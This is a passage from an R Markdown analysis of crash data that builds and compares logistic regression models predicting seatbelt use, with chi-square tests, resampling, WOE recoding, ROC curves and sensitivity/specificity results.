factor(person_crashes_roadway_innerjoin$ROAD_CONDITION, labels = c('Dry', 'Wet', 'Sand, mud, dirty, gravel', 'Snow', 'Slush', 'Ice', 'Ice Patches', 'Water','Other', 'Unknown'))\nlevels(person_crashes_roadway_innerjoin$ROAD_CONDITION) <- list(Dry = \"Dry\", Winter = c(\"Snow\", \"Ice Patches\", \"Slush\", \"Ice\"), Other = \"Other\", Wet = c(\"Water\", \"Wet\"), Unpaved = \"Sand, mud, dirty, gravel\", Unknown = \"Unknown\") #Group into four categories\n\nperson_crashes_roadway_innerjoin$WEATHER <- factor(person_crashes_roadway_innerjoin$WEATHER, labels = c('Unknown -1', 'Clear', 'Rain', 'Sleet', 'Snow', 'Fog', 'Rain and fog', 'Sleet and fog', 'Other', 'Unknown'))\nlevels(person_crashes_roadway_innerjoin$WEATHER) <- list(Unknown = c(\"Unknown -1\", \"Unknown\"), Clear = \"Clear\", Rain = c(\"Rain\", \"Rain and fog\"), Fog = \"Fog\", Snow = c(\"Sleet\", \"Snow\", \"Sleet and fog\"), Other = \"Other\")\nperson_crashes_roadway_innerjoin <- subset(person_crashes_roadway_innerjoin, person_crashes_roadway_innerjoin$WEATHER == \"Clear\" | person_crashes_roadway_innerjoin$WEATHER == \"Rain\" | person_crashes_roadway_innerjoin$WEATHER == \"Fog\" | person_crashes_roadway_innerjoin$WEATHER == \"Snow\", drop = TRUE)\nperson_crashes_roadway_innerjoin$WEATHER <- droplevels(person_crashes_roadway_innerjoin$WEATHER) #Keep only Weather of Clear, snow, Rain, and Fog\n\nperson_crashes_roadway_innerjoin <- subset(person_crashes_roadway_innerjoin, person_crashes_roadway_innerjoin$HOUR_OF_DAY < 99) #Remove unknown Hour of Day\nperson_crashes_roadway_innerjoin$HOUR_OF_DAY <- factor(person_crashes_roadway_innerjoin$HOUR_OF_DAY)\n\nperson_crashes_roadway_innerjoin <- subset(person_crashes_roadway_innerjoin, LANE_COUNT == 1 | LANE_COUNT == 2 | LANE_COUNT == 3 | LANE_COUNT == 4 | LANE_COUNT == 5 | LANE_COUNT == 6, drop = TRUE) #Drop lane counts greater than 6\n\nperson_crashes_roadway_innerjoin <- subset(person_crashes_roadway_innerjoin, SPEED_LIMIT < 65, drop = TRUE) #There are only 6 observations with speed limit of 65. For model fitting we cannot have a train data set with 65 and a test set withourt 65. Therefore, we drop anything greater than 65. \n\nstr(person_crashes_roadway_innerjoin)\n```\n\nWe can confirm that Weather, Hour of Day, Speed Limit and Lane Count are as we desire them and have dropped levels.\n```{r}\ntable(person_crashes_roadway_innerjoin$WEATHER)\n\ntable(person_crashes_roadway_innerjoin$HOUR_OF_DAY)\n\ntable(person_crashes_roadway_innerjoin$LANE_COUNT)\n\ntable(person_crashes_roadway_innerjoin$SPEED_LIMIT)\n```\n\nWe now have a dataframe filled with categorical variables and a response variable of seatbelt_yn. We'll copy this into a new dataframe called crashes_persons_roadway. We'll also set the response variable to be more interpretable, making 0 represent seatbelt = NO and 1 represent seatbelt = Yes. \n```{r}\ndf <- person_crashes_roadway_innerjoin\n\nrequire(plyr)\n#can also do this with index numbers, but this is more readable\nkeep <- df[,c(\"CRN\", \"CRASH_YEAR\", \"SEX\", \"AGE\", \"TRANSPORTED\", \"Involvement\", \"AgeGroup\",\n \"seatbelt\", \"HOUR_OF_DAY\" , \"DAY_OF_WEEK\" , \"CRASH_MONTH\" , \"WEATHER\" , \"ROAD_CONDITION\", \"LATITUDE\", \"LONGITUDE\" , \"LANE_COUNT\" , \"SPEED_LIMIT\")]\n\nkeep$seatbelt_yn <- revalue(keep$seatbelt, c(\"No\"=0, \"Yes\"=1))\n\ncrashes_persons_roadway <- keep[,c(\"SEX\", \"AGE\", \"Involvement\", \"AgeGroup\",\n \"seatbelt_yn\", \"HOUR_OF_DAY\" , \"CRASH_MONTH\" , \"WEATHER\" , \"LANE_COUNT\" , \"SPEED_LIMIT\")]\n\n#fix seatbelt_yn factor ordering\ncrashes_persons_roadway$seatbelt_yn <- factor(crashes_persons_roadway$seatbelt_yn, labels = c(0, 1))\nstr(crashes_persons_roadway)\n```\n\nAfter these cleaning steps we have a dataframe with 43,463 observations and 10 variables. In order to build several different models and compare the performance of these models we now need to create some new variables that are grouping of our variables. \n\nFor example, HOUR_OF_DAY will be turned into a Night_DAY factor variable, but also left as 24 hours. This will let us test two models. The first will let us see whether Night versus Day is significant for predicting seatbelt use. The 24 level hour of day will allow us to identify the specific Hours of Day that contribute to this effect. We'll create two different time ranges for night vs. day.\n\nAfter we create these two new groups, we'll run a Chisq test to make sure that these groupings show significant differences in seatbelt use. \n```{r}\n#Mapping values for night as 9PM & 12AM and running ChiSq on two groups\ncrashes_persons_roadway$night <- mapvalues(crashes_persons_roadway$HOUR_OF_DAY, \n from = c(\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\",\n \"7\", \"8\", \"9\", \"10\", \"11\", \"12\",\n \"13\", \"14\", \"15\", \"16\", \"17\", \"18\",\n \"19\", \"20\", \"21\", \"22\", \"23\"),\n to = c(\"Late Night\", \"Late Night\", \n \"Not Late Night\", \"Not Late Night\", \n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Late Night\",\n \"Late Night\", \"Late Night\"))\nnight_chi = table(crashes_persons_roadway$night, crashes_persons_roadway$seatbelt_yn)\nnight_chi\nchisq.test(night_chi)\n\n#Mapping second set of values for variable that is a 'longer_night' as 9PM - 4AM;\ncrashes_persons_roadway$longer_night <- mapvalues(crashes_persons_roadway$HOUR_OF_DAY, \n from = c(\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\",\n \"7\", \"8\", \"9\", \"10\", \"11\", \"12\",\n \"13\", \"14\", \"15\", \"16\", \"17\", \"18\",\n \"19\", \"20\", \"21\", \"22\", \"23\"),\n to = c(\"Night\", \"Night\", \n \"Night\", \"Night\", \n \"Night\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Night\",\n \"Night\", \"Night\"\n ))\nlonger_night_chi <- table(crashes_persons_roadway$longer_night, \n crashes_persons_roadway$seatbelt_yn)\nlonger_night_chi\nchisq.test(longer_night_chi)\n```\nRunning a Chisq test on these two groups tells us that they have a significant differences in terms of expected versus observed frequencies for Seatbelt use. The longer_night variable shows greater significance, so we will primarily use this variable for model building. \n\nNext, we'll create a two level factor variable for Weather and run a ChiSq\n```{r}\ncrashes_persons_roadway$precip <- mapvalues(crashes_persons_roadway$WEATHER, \n from = c(\"Clear\", \"Rain\", \n \"Fog\", \"Snow\"),\n to = c( \"No Precip\", \"Precip\",\n \"No Precip\", \"Precip\"))\nweather_chi = table(crashes_persons_roadway$precip, crashes_persons_roadway$seatbelt_yn)\nweather_chi\nchisq.test(weather_chi)\n```\nRunning a Chisq test on these two weather groups tells us that they have a significant differences in terms of expected versus observed frequencies for Seatbelt use. \n\nNext, create two levels for Speed Limit: Low Speed or High Speed and Run Chi Square\n```{r}\n#Roads > 35 MPH = High Speed\ncrashes_persons_roadway$Speed_Category <- cut(crashes_persons_roadway$SPEED_LIMIT, c(0,35,65), labels = c(\"Low Speed\", \"High Speed\"))\n\nspeed_category_chi <- table(crashes_persons_roadway$Speed_Category, \n crashes_persons_roadway$seatbelt_yn)\nchisq.test(speed_category_chi)\n```\n\nAgain, we see that these two groups have significant differences. Finally, we'll create new a new two level variable for Lane Counts: Big Road or Small Road and run a ChiSquare test. \n```{r}\n#Roads with Lane Cournt >2 = Big Road\ncrashes_persons_roadway$Road_Size <- cut(crashes_persons_roadway$LANE_COUNT, c(0,2,6), labels = c(\"Small Road\", \"Big Road\"))\ncrashes_persons_roadway$LANE_COUNT <- factor(person_crashes_roadway_innerjoin$LANE_COUNT)\n\nroad_size_chi <- table(crashes_persons_roadway$Road_Size, \n crashes_persons_roadway$seatbelt_yn)\nchisq.test(road_size_chi)\n```\n\nThe Chi-square again returns a significant result. Across all of our new variables, we can reject the null hypothesis that the distribution of seatbelt use is independent of these factors. \n\n### 7. Logistic Regression Model Building Using GLM and GLMMULTI.\n\nTo this point we have completed an EDA of the newly added variables and reduced the dimensionality of our primary dataframe - 'crashes_persons_roadway\" - by re-coding four variables in our data to be two level factor variables. Overall, this should help make our model more interpretable and reduce the noise in it. We are now going to set some final variables to factors, and copy this into a three separate dataframes that we will pass to our various modeling functions and compare the performance. \n\n```{r}\n#Copy Dataframe and Set Variables to Factors\ncrashes_persons_roadway_copy <- crashes_persons_roadway\n\ncrashes_persons_roadway_copy$Involvement <- as.factor(crashes_persons_roadway_copy$Involvement)\n\ncrashes_persons_roadway_copy$SPEED_LIMIT <- as.factor(crashes_persons_roadway_copy$SPEED_LIMIT)\n\n\n#Create four new dataframes from variables in the 'crashes_persons_roadway_copy' datafrane\ndf_Grouped_night <- crashes_persons_roadway_copy[,c(\"SEX\", \"AgeGroup\", \"Involvement\",\n \"night\", \"precip\" , \"Road_Size\", \"Speed_Category\", \"seatbelt_yn\")]\n\ndf_Grouped_longNight <- crashes_persons_roadway_copy[,c(\"SEX\", \"AgeGroup\", \"Involvement\",\n \"longer_night\", \"precip\" , \"Road_Size\", \"Speed_Category\", \"seatbelt_yn\")]\n\ndf_Ungrouped_AgeGroup <-crashes_persons_roadway_copy[,c(\"SEX\", \"AgeGroup\", \"Involvement\",\n \"HOUR_OF_DAY\" , \"WEATHER\" , \"LANE_COUNT\", \"SPEED_LIMIT\", \"seatbelt_yn\")]\n\n```\n\n### Model 1: GLM Logit Regression \n\nFor our first model, we'll use forward selection with the crashes_persons_roadway_copy dataframe. We'll select from the newly created categorical variables that we identified as affecting seatbelt use through Chi-square testing. \n\n```{r, echo = TRUE}\n#Create training and test data sets\ninstall.packages(\"InformationValue\") #Used for calculating sensitvity, specifcity, and ROC Curves with AUROC\nlibrary(InformationValue)\n\n\n#60% of dataset for training sets\nsmp_size <- floor(0.6 * nrow(crashes_persons_roadway_copy))\n\n#set seed to make partition reproductible\nset.seed(122)\ntrain_ind <- sample(seq_len(nrow(crashes_persons_roadway_copy)), size = smp_size)\n\ntrain_new <- crashes_persons_roadway_copy[train_ind, ]\ntest_new <- crashes_persons_roadway_copy[-train_ind, ]\n\n#Train the logit_reduced model\nlogit_reduced <- glm(seatbelt_yn~SEX+AgeGroup+Involvement+longer_night+Road_Size+\n Speed_Category+precip, family = binomial(link=\"logit\"), data = train_new)\nsummary(logit_reduced)\nexp(cbind(OR = coef(logit_reduced), confint(logit_reduced))) #Print Odds Ratio and ConfInt \n```\n\nThe summary of the logit_reduced model shows us that all of our variables and level are significant except for Age Group: Early Middle Age. After we transform the coefficient variables we can more easily interpret how each coefficient affects the likelihood for wearing a seatbelt. Being a passenger or a Male makes someone in this dataset less likely to wear a seatbelt. Increasing age, daytime hours, large roads, or high speed limits make someone more likely to be wearing a seatbelt. Being on a \"high\" speed limit road - defined as above 35 mph - makes the odds of someone wearing a seatbelt 4.4 times higher! Wow.\n\nLet's get our accuracy, ROC curve, and then review the confusion matrix.\n```{r}\nnew_predictions <- predict(object = logit_reduced, newdata = test_new,\n type=\"response\")\nnew_binary_predictions <- ifelse(new_predictions > 0.5,1,0) #use same .7 thresh \nnew_misses <- mean(new_binary_predictions != test_new$seatbelt_yn)\nnew_hits <- 1 - new_misses\nprint(\"Reduced Model Hit Rate:\")\nnew_hits \nrequire(ROCR)\nrequire(InformationValue)\nROCRpred <- prediction(new_predictions, test_new$seatbelt_yn)\nROCRperf <- performance(ROCRpred, 'tpr','fpr')\nplot(ROCRperf, colorize = TRUE, text.adj = c(-0.2,1.7))\n\n#ROC PLOT WITH AREA UNDER CURVE\nplotROC(test_new$seatbelt_yn, new_predictions)\n\n#CONFUSION MATRIX\ntable(test_new$seatbelt_yn)\nconfusionMatrix(test_new$seatbelt_yn, new_predictions)\n\ncat(\"Sensitivity: \", sensitivity(test_new$seatbelt_yn, new_predictions, threshold = 0.5), \"\\n\") #Sensitivity (or True Positive Rate) is the percentage of 1s (actuals) correctly predicted by the model, \n\ncat(\"Specificity: \", specificity(test_new$seatbelt_yn, new_predictions, threshold = 0.5)) #specificity is the percentage of 0s (actuals) correctly predicted. \n\n```\nFrom looking at the Hit Rate and area under the curve, this model is performing decently well. However, we know a hit rate of 80% is approximately equal to the distribution of seatbelt use versus non-seatbelt use observations. Let's look at our sensitivity and specificity scores to get a better idea of where and how i.e., the types of errors our classification model is making.\n\nSensitivity = 0.9964298 \nSpecificity = 0.01123928\n\nLooking at sensitivity, we can see that our model is doing a good job of predicting those who will wear their seatbelts. However, it is doing a terrible job of predicting who will not shown as by 'Specificity' of 0.01. The sensitivity tell us the number true positives that are model is accurately predicting. The specificity tells us the number of true negatives/non-events that our model is accurately predicting. In this case a non-event is not wearing a seatbelt. These ratios are shown below: \n \n Sensitivity=# Actual 1s and Predicted as 1s\n -------------------------------- \n # of Actual 1s\n \n Specificity= # Actual 0s and Predicted as 0s \n ----------------------------\n # of Actual 0s\n\nLet's explore some other models to see if we can improve specificity. \n\n### Model 2: Main Terms Effect Logistic Regression Using GLMULTI\nWe'll next use the glmulti package to train a model using ourr df_Grourped_longnight dataframve. Glmulti provides automated model selection and model-averaging as a wrapper function for glm that automatically generates all possible models under constraints set by the user such as Information Criterion (AIC, AICc or BIC) for performance evaluation. \n```{r}\n#Here is the information for the Glmulti package: https://cran.r-project.org/web/packages/glmulti/glmulti.pdf Under the Section \"glmulti Automated model selection and multimodel inference with (G)LMs\"\n\ninstall.packages(\"glmulti\")\nlibrary(glmulti)\n\n#60% of dataset for training sets\nsmp_size_mainT <- floor(0.6 * nrow(df_Grouped_longNight))\n\n#set seed to make partition reproductible\nset.seed(6)\ntrain_ind_mainT <- sample(seq_len(nrow(df_Grouped_longNight)), size = smp_size_mainT)\n\ntrain_mainT <- df_Grouped_longNight[train_ind_mainT, ]\ntest_mainT <- df_Grouped_longNight[-train_ind_mainT, ]\n\n\nglmmulti.logistic.out <- glmulti(seatbelt_yn~., data = train_mainT, \n level = 1, # No interaction considered\n method = \"h\", #Exhaustive Approach\n crit = \"aic\", #AIC Criteria\n confsetsize = 5, # Keep 5 Best Model\n plotty = F, report = F, \n fitfunction = 'glm', #GLM function\n family = binomial)\n\nsummary(glmmulti.logistic.out@objects[[1]])\n```\n\nAs before, all of our variables comve back significant except for Age Group Early Middle Age. We'll save Model 2 as a model object, print the Odds Ratios and Coefficient Confidence intervals followed by looking at the Hit Rate, ROC, and Sensitivity/ Specificity. \n```{r}\n#Save the best model as an object, and set up a transformed Odds Ratio and Coeff table \nbestMulti.glm.fit <- glmmulti.logistic.out@objects[[1]]\n\n#Odds ratio and confict intervals for transformed coefficients\ncat(\"Odds Ratios and Coefficient Confidence Intervals: \", \"\\n\") \nexp(cbind(OR = coef(bestMulti.glm.fit), confint(bestMulti.glm.fit))) #See Odss Ratio and Confidence Intervals for Coefficients\n\n#Predictions\npred_mainT <- predict(object = bestMulti.glm.fit, newdata = test_mainT,\n type=\"response\")\nnew_binary_predictionsMainT <- ifelse(pred_mainT > 0.5,1,0) #use same .7 thresh \nnew_missesMainT <- mean(new_binary_predictionsMainT != test_mainT$seatbelt_yn)\nnew_hits_mainT <- 1 - new_missesMainT\ncat(\"Reduced Model Hit Rate: \", new_hits_mainT, \"\\n\")\n\n#Print ROC Curves\nrequire(ROCR)\nROCRpred_mainT <- prediction(pred_mainT, test_mainT$seatbelt_yn)\nROCRperf_mainT <- performance(ROCRpred_mainT, 'tpr','fpr')\nplot(ROCRperf_mainT, colorize = TRUE, text.adj = c(-0.2,1.7))\nplotROC(test_mainT$seatbelt_yn, pred_mainT)\n\n#Print Specificity and Sensitivity\ncat(\"Sensitivity: \", sensitivity(test_mainT$seatbelt_yn, pred_mainT, threshold = 0.5), \"\\n\")\ncat(\"Specificity: \", specificity(test_mainT$seatbelt_yn, pred_mainT, threshold = 0.5))\n\n```\nThis model returns very similar results and shows no appreciable improvement. The area under the ROC curve is 0.71647, slightly worse than the previous model. The AIC value is also similar. More importantly, this model is just as poor at predicting drivers who do not wear seatbelts, but is good at predicting True Positives for seatbelt usage. \n\nLet's run an ANOVA to see if this can help gives us some insight into the comparative performance of these models. \n```{r}\nanova(logit_reduced, bestMulti.glm.fit, test = \"Chisq\")\n```\n\nRunning ANOVA, we see that Model 1 performs slightly better in terms of variance explained. However, neither model can break a hit rate of more than 80%, which is roughly equivalent to the distribution of Seatbelt Use 'Yes' versus 'No'. Furthermore, we've had no success accurately predicting Drivers or Passengers who do not wear seatbelts despite creating variables that were confirmed by ChiSq tests to be extremely significant. \n\n### Model 4: GLM with Unbiased Resampled Data Using Information Value Package and df_Grouped_longNight Dataframe\nThe next thing we can do to try fit a model to is address the bias in our data. We can resample our training data to draw \"Yes\" and \"No\" in equal proportions. We'll go ahead and do this, but first we'll convert some of our categorical variables to continuous variables represented as Weight of Evidence (WOE) equivalents. WOEs are commonly used for assessing credit risk and provides a method of re-coding categorical variables to continuous variables. The formula for WOE is as follows:\n\n WOE = ln(percent good of all goods/ percent bad of all bads)\n \nIn this formula, goods is synonymous with ones or Yes events and bads is synonymous with zeros, non-events, negatives or non-responders. Overall, the WOE is calculated using a basic odds ratio. \n\nLet's start by re-coding the categorical variables in our df_Grouped_longNight dataframe to continuous WOE variables. To do this we'll use the InformationValue package.\n```{r}\n#Copy our data frame\ndf_Grouped_longNight_copy <- df_Grouped_longNight\n\n#Select categorical variables for recoding to continuous\nfactor_vars <- c (\"SEX\", \"Involvement\", \"longer_night\", \"precip\", \"Road_Size\", \"Speed_Category\", \"AgeGroup\")\n\n#install.packages(\"InformationValue\")\nlibrary(InformationValue)\n\n#Conditional for loop to translate factor vaiables\nfor(factor_var in factor_vars){\n df_Grouped_longNight_copy[[factor_var]] <- WOE(X=df_Grouped_longNight_copy[, factor_var], Y=df_Grouped_longNight_copy$seatbelt_yn)\n}\n\nhead(df_Grouped_longNight_copy)\n```\n\nAlright, we have our categorical variables translated to continuous variables using the InformationValue package's WOE function. \n\nNext, let's resample our training dataset and test dataset. In this case, the training data will have an equal sample of 0s and 1s, but the test data set will have a distribution of 0s and 1s similar to the raw data. Additionally our training data will be smaller than our test data, but the training data will still have over 10k observations. \n```{r}\n#Store two new dataframes one that contains all the Yes observations and One all of the No oobservations\nseatbelt_y <- df_Grouped_longNight_copy[which(df_Grouped_longNight_copy$seatbelt_yn == 1), ] # all 1's\nseatbelt_n <- df_Grouped_longNight_copy[which(df_Grouped_longNight_copy$seatbelt_yn == 0), ] # all 0's\n\nset.seed(40) # for repeatability of samples\n\nseatbelt_y_training_rows <- sample(1:nrow(seatbelt_y), 0.7*nrow(seatbelt_n)) # ***Pick as many 0's as 1's\nseatbelt_n_training_rows <- sample(1:nrow(seatbelt_n), 0.7*nrow(seatbelt_n)) \n# 1's for training\ntraining_y <- seatbelt_y[seatbelt_y_training_rows, ] \ntraining_n <- seatbelt_n[seatbelt_n_training_rows, ]\ntrainingData <- rbind(training_y, training_n) # row bind the 1's and 0's \n\n# Create Test Data\ntestData_size <- sample(1:nrow(df_Grouped_longNight_copy), size = 25000 ) #Select 25,000 observations for testing\ntestData <- df_Grouped_longNight_copy[testData_size, ]\n\n#Confirm the distributions of seatbelt Use in trainingData and testData\ntable(trainingData$seatbelt_yn)\ntable(testData$seatbelt_yn)\n```\nAlright, we see that the distribution of 0s and 1s in our trainingData is as we want it after resampling. \n\nLet's now train Model 3 using GLM with our new unbiased training data. Afterwards, we'll look at model summary, variable inflation factors for collinearity, and Odds Ratios. \n```{r}\n#Train model\nlogitMod <- glm(seatbelt_yn ~., data=trainingData, family=binomial(link=\"logit\"), weights = )\nsummary(logitMod) #Summarize the model\n\n#Print Odds Ratio\nexp(cbind(OR = coef(logitMod), confint(logitMod)))\n\nrequire(car)\nvif(logitMod) #check collinearity, all variables have a VIF well below 4\n```\n\nLooking at the Odds Ratio, this models seems to place more weight on Sex, Night Versus Day and Weather. Interestingly, the model does not return a significant p-value for Road_Size and the Odds Ratio is close to 1 with a value of 1.06. We see that none of the variables have VIF approaching four, so we can feel confident that there is little collinearity. \n\nLet's look at the hit rate. To do this, we'll use a function in the Information Value package called misClassError. The Hit Rate is simply 1 - misClassError. \n\nWe'll then plot the ROC curve, which includes an Area Under the Curve (AUC) for the ROC. Finally, we'll again assess the Sensitivity and Specificity to see if the model is performing better with regards to predicting non-seatbelt users.\n\n```{r}\n#Create a prediction object\npredicted <- plogis(predict(logitMod, testData)) # to convert it into prediction probability scores that is bound between 0 and 1, we use the plogis().\n\n#Misclassification Error/Hit Rate\ncat(\"Hit Rate= \", 1- misClassError(testData$seatbelt_yn, predicted, threshold = 0.5), \"\\n\")\n\n#Print ROC\nplotROC(testData$seatbelt_yn, predicted)\n\n#Print Sensitivity and Specificity and Confusion Matrix\ncat(\"Sensitivity: \", sensitivity(testData$seatbelt_yn, predicted, threshold = 0.5), \"\\n\")\ncat(\"Specifity: \" , specificity(testData$seatbelt_yn, predicted, threshold = 0.5))\nconfusionMatrix(testData$seatbelt_yn, predicted)\n#GUYS NOTE HERE THAT IF YOU MAKE THE THRESHOLD HIGHER, OUR SPECIFICITY GETS BETTER AT THE COST OF SENSITIVITY. I also experimented to see what would happen if your changed the distrbrution of 0s and 1s slightly to say 60-40 or if your changed the size of the ttest data. It does seem that an even split of 0s and 1s and a test data size of 25,000 is optial. \n```\n\nThe results here are more encouraging. Although our hit rate is worse at 62.7%, we are doing many times better with the Specificity of our model which is 0.764 i.e., predicting who did not wear seatbelts. However, this improvement in specificity is coming at the cost of Sensitivity (True Positives) i.e. those who are wearing seatbelts. \n\nOverall, these results are confirming that sample bias was confounding our model. Now that we know this was an issue, let's test a few more models using this approach. \n\n### Model 4: GLM with Unbiased Resampled Data Using Information Value Package and df_Ungrouped_Age Dataframe\nThe next model we'll test is using the df_Ungrouped_Age dataframe. We'll see if leaving our categorical variables ungrouped improves the model. As before, we'll start by re-coding the categorical variables to WOE continuous variables and then resampling our training and test data.\n```{r}\nset.seed(105) # for repeatability of sample\n\n#df_Ungrouped_AgeGroup <-crashes_persons_roadway_copy[,c(\"SEX\", \"AgeGroup\", \"Involvement\",\n # \"HOUR_OF_DAY\" , \"WEATHER\" , \"LANE_COUNT\", \"SPEED_LIMIT\", \"seatbelt_yn\")]\n\n#Copy our data frame\ndf_Ungrouped_AgeGroup_copy <- df_Ungrouped_AgeGroup\n\n#Select categorical variables for recoding to continuous\nfactor_vars_dfAge <- c (\"SEX\", \"Involvement\", \"AgeGroup\", \"HOUR_OF_DAY\", \"LANE_COUNT\", \"SPEED_LIMIT\", \"WEATHER\")\n\n#Conditional for loop to translate factor vaiables\nfor(factor_var in factor_vars_dfAge){\n df_Ungrouped_AgeGroup_copy[[factor_var]] <- WOE(X=df_Ungrouped_AgeGroup_copy[, factor_var], Y=df_Ungrouped_AgeGroup_copy$seatbelt_yn)\n}\n\nhead(df_Ungrouped_AgeGroup_copy)\n\n# Create Training Data\nseatbelt_y_df_age <- df_Ungrouped_AgeGroup_copy[which(df_Ungrouped_AgeGroup_copy$seatbelt_yn == 1), ] # all 1's\nseatbelt_n_df_age <- df_Ungrouped_AgeGroup_copy[which(df_Ungrouped_AgeGroup_copy$seatbelt_yn == 0), ] # all 0's\n\nseatbelt_y_dfAge_training_rows <- sample(1:nrow(seatbelt_y_df_age), 0.7*nrow(seatbelt_n_df_age)) # ***Pick as many 1's as 0's\nseatbelt_n_dfAge_training_rows <- sample(1:nrow(seatbelt_n_df_age), 0.7*nrow(seatbelt_n_df_age)) \n\ntraining_y_df_age <- seatbelt_y_df_age[seatbelt_y_dfAge_training_rows, ] \ntraining_n_df_age <- seatbelt_n_df_age[seatbelt_n_dfAge_training_rows, ]\n\ntrainingData_dfAge <- rbind(training_y_df_age, training_n_df_age) # row bind the 1's and 0's \n\n# Create Test Data\ntestData_size_dfAge <- sample(1:nrow(df_Ungrouped_AgeGroup), size = 25000 )\n\ntestData_dfAge <- df_Ungrouped_AgeGroup_copy[testData_size_dfAge, ]\n\ntable(trainingData_dfAge$seatbelt_yn)\n\ntable(testData_dfAge$seatbelt_yn)\n\n```\n\nWith the variables recoded and our training data resampled to account for bias, we can now test Model 4. As before, we'll print a summary of the model, Odds Ratios and Confidence Intervals, and then the VIFs. \n```{r}\nlogitMod_dfAge <- glm(seatbelt_yn ~., data=trainingData_dfAge, family=binomial(link=\"logit\"))\nsummary(logitMod_dfAge)\n\n#Print Odds Ratio\nexp(cbind(OR = coef(logitMod_dfAge) , confint(logitMod_dfAge)))\n\n#Print VIF\nvif(logitMod_dfAge)\n\n```\nThe Odds Ratio shows that Model 4 is using Sex, Hour of the Day, and Weather very strongly. Speed Limit also affects Seatbelt Use. From only the Odds Ratios is does not appear that grouping or ungrouping the variables has considerable effect. \n\nNext, we'll create prediction, plot ROC, and show Hit Rate using misclassification error, Specificity, and Sensitivity. \n```{r}\npredicted_dfAge <- plogis(predict(logitMod_dfAge, testData_dfAge)) # to convert it into prediction probability scores that is bound between 0 and 1, we use the plogis().\n\n#Hit Rate\ncat(\"Hit Rate: \", 1 - misClassError(testData_dfAge$seatbelt_yn, predicted_dfAge, threshold = 0.5), \"\\n\")\n\n#Plot ROC\nplotROC(testData_dfAge$seatbelt_yn, predicted_dfAge)\n\n#Print Sensitivity and Specificity and Confusion Matrix\ncat(\"Sensitivity: \", sensitivity(testData_dfAge$seatbelt_yn, predicted_dfAge, threshold = 0.5), \"\\n\")\ncat(\"Specifity: \" , specificity(testData_dfAge$seatbelt_yn, predicted_dfAge, threshold = 0.5))\nconfusionMatrix(testData_dfAge$seatbelt_yn, predicted_dfAge)\n\n#Note again increasing threshold will improve specificity at the cost of overall Hit Rate and sensitivity\n```\nModel 4 returns similar results to Model 3. \n\nHit Rate: 0.6369 \nSensitivity: 0.607104 \nSpecificity: 0.762641\n\nWe can feel safe assuming that the model's performance is unaffected by how we have grouped our our variables. Overall, Model 4 performed slightly better, but the difference seems negligible, especially considering we are using different random samples to build our training data. \n\n### Model 6: Pass Unbiased Training Data to Glmulti with df_Grouped_longnight\nLet's try one more model. For this, we'll use the df_Grouped_long night dataframe and resample the training data so we have an unbiased training sample. Then, we'll pass this training data to GLMULTI to take advantage of its exhaustive search functionality and model averaging abilities. \n```{r}\n#Check that we are rusing the right training and test data\nhead(trainingData)\ntable(trainingData$seatbelt_yn)\n\nhead(testData)\n```\n\nWe'll now pass this data to glmulti. As before we'll then save then best model as a model object before printing a summary of the model, Odds Ratios, and VIFs to check for collinearity. \n\n```{r}\nset.seed(55)\nglmmulti.unbiased <- glmulti(seatbelt_yn~., data = trainingData, \n level = 1, # No interaction considered\n method = \"h\", #Exhaustive Approach\n crit = \"aic\", #AIC Criteria\n confsetsize = 5, # Keep 5 Best Model\n plotty = F, report = F, \n fitfunction = 'glm', #GLM function\n family = binomial)\n\n#Save the best model as an object\nglmmulti.unbiased <- glmmulti.unbiased@objects[[1]]\n\n#Print model summary\nsummary(glmmulti.unbiased)\n\n#Odds ratio and confict intervals for transformed coefficients\nexp(cbind(OR = coef(glmmulti.unbiased), confint(glmmulti.unbiased))) #See Odss Ratio and Confidence Intervals for Coefficients\n\nvif(glmmulti.unbiased)\n\n```\n\nThe glmulti package selected a model that includes Sex, AgeGroup, longer_night, precip, and Speed_Category. Interestingly, it did not include the Road_Size variable. Its possible that it excluded it and chose to include the Speed Category. Overall, the Odds Ratios show Sex, Night vs Day, and Weather as the having the largest effect on whether someone will wear a seatbelt. \n\nAs the final step, we'll print out the ROC, Specificity, Sensitivity, and Confusion Matrix. \n```{r}\npredicted_glmUnbiased <- plogis(predict(glmmulti.unbiased, testData)) # to convert it into prediction probability scores that is bound between 0 and 1, we use the plogis().\n\n#Hit Rate\ncat(\"Hit Rate: \", 1 - misClassError(testData$seatbelt_yn, predicted_glmUnbiased, threshold = 0.5), \"\\n\")\n\n#Plot ROC\nplotROC(testData$seatbelt_yn, predicted_glmUnbiased)\n\n#Print Sensitivity and Specificity and Confusion Matrix\ncat(\"Sensitivity: \", sensitivity(testData$seatbelt_yn, predicted_glmUnbiased, threshold = 0.5), \"\\n\")\ncat(\"Specifity: \" , specificity(testData$seatbelt_yn, predicted_glmUnbiased, threshold = 0.5))\nconfusionMatrix(testData$seatbelt_yn, predicted_glmUnbiased)\n\n#Note again increasing threshold will improve specificity at the cost of overall Hit Rate and sensitivity\n\n```\nThe performance of Model 5 is similar to models 3 & 4. The performances are shown below. \n\nModel 3 Model 4 Model 5\nHit Rate= 0.6272 Hit Rate: 0.6369 Hit Rate: 0.6239 \nSensitivity: 0.5941921 Sensitivity: 0.607104 Sensitivity: 0.5894763 \nSpecificity: 0.7639547 Specificity: 0.762641 Specificity: 0.7666323 \nAIC: 14461 AIC: 14209 AIC: 14460\n \nSo far, we have tested 5 models. It appears that Model 4 - logitMod_dfAge - performs the best. Although it's hit rate is only ~64%, it predicts who will not wear a seatbelt (specificity) with greater than 75% accuracy . Given that this is the purpose of this analysis, we'll move forward with this model. \n\n### 8. Cross Validation of Model 4 logitMod_dfAge\n\nAs a next step, we'll do a cross validation to see this models performance across a number of iterations. For this cross validation, we'll actually do a variant of k-fold cross validation where we randomly break the dataset up into chunks of 85% and 15% and test the model over 250 iterations. In k-fold cross validation, the dataset is partitioned into k equally sized segments or folds to train the model. Within each iteration of the cross validation, one fold is held out as the test data while the k-1 other folds are used to train the model. 